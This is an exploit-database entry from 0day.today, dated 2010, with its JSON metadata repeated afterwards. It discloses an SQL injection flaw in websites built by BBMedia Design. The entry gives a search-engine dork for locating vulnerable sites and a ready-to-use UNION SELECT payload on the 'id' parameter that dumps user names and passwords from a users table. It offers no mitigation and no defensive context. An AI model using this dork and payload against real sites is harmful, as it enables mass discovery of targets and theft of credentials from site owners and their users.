ID 1337DAY-ID-12365
Type zdt
Reporter XroGuE
Modified 2010-05-23T00:00:00
Description
Exploit for php platform in category web applications
============================================
BBMedia Design's SQL Injection Vulnerability
============================================
##########################################
# Name: BBMedia Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://www.bbmedia.org
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################
[+] Dork: intext:"Design by BB Media.Org"
[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]
[+] Demo: http://server/prod_motors.php?id=-999+union+all+select+1,2,3,4,5,group_concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12+from+users
##########################################
# 0day.today [2018-03-05] #
{"id": "1337DAY-ID-12365", "lastseen": "2018-03-06T01:41:45", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2018-03-06T01:41:45", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_KERNEL-6632.NASL", "SUSE_KERNEL-6636.NASL"]}, {"type": "suse", "idList": ["SUSE-SA:2009:055"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12365"]}], "modified": "2018-03-06T01:41:45", "rev": 2}, "vulnersScore": 1.9}, "type": "zdt", "sourceHref": "https://0day.today/exploit/12365", "description": "Exploit for php platform in category web applications", "title": "BBMedia Design's (prod_motors.php) SQL Injection Vulnerability", "cvelist": [], "sourceData": "============================================\r\nBBMedia Design's SQL Injection Vulnerability\r\n============================================\r\n\r\n\r\n##########################################\r\n# Name: BBMedia Design's SQL Injection Vulnerability\r\n# Date: 2010-05-23\r\n# vendor: http://www.bbmedia.org\r\n# Author: Ashiyane Digital Security Team\r\n# Discovered By: XroGuE\r\n# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com\r\n# Home: www.Ashiyane.org\r\n##########################################\r\n \r\n[+] Dork: intext:\"Design by BB Media.Org\"\r\n \r\n[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]\r\n \r\n[+] Demo: http://server/prod_motors.php?id=-999+union+all+select+1,2,3,4,5,group_concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12+from+users\r\n \r\n##########################################\r\n\r\n\n\n# 0day.today [2018-03-05] #", "published": "2010-05-23T00:00:00", "references": [], "reporter": "XroGuE", "modified": "2010-05-23T00:00:00", "href": "https://0day.today/exploit/description/12365"}
{}